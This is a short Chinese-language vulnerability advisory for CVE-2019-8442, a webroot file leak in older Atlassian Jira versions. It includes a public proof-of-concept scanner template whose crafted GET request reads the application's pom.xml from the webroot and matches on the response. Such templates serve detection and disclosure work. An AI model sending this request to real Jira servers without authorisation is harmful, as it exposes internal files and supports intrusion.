漏洞描述
Atlassian Jira是澳大利亚Atlassian公司的一套缺陷跟踪管理系统。该系统主要用于对工作中各类问题、缺陷进行跟踪管理。
Atlassian Jira 7.13.4之前版本、8.0.4之前版本和8.1.1之前版本中的CachingResourceDownloadRewriteRule类存在安全漏洞。远程攻击者可利用该漏洞访问Jira webroot中的文件。
CVE-2019-8442: Atlassian Jira webroot leak
PoC代码[已公开]
id: CVE-2019-8442
info:
name: Atlassian Jira webroot leak
author: pa55w0rd(www.pa55w0rd.online/)
severity: high
description: |
Atlassian Jira是澳大利亚Atlassian公司的一套缺陷跟踪管理系统。该系统主要用于对工作中各类问题、缺陷进行跟踪管理。
Atlassian Jira 7.13.4之前版本、8.0.4之前版本和8.1.1之前版本中的CachingResourceDownloadRewriteRule类存在安全漏洞。远程攻击者可利用该漏洞访问Jira webroot中的文件。
transport: http
rules:
r0:
request:
method: GET
path: /s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
expression: response.status == 200 && response.body.bcontains(bytes(string(b"<groupId>com.atlassian.jira</groupId>"))) && response.content_type.contains("application/xml")
expression: r0()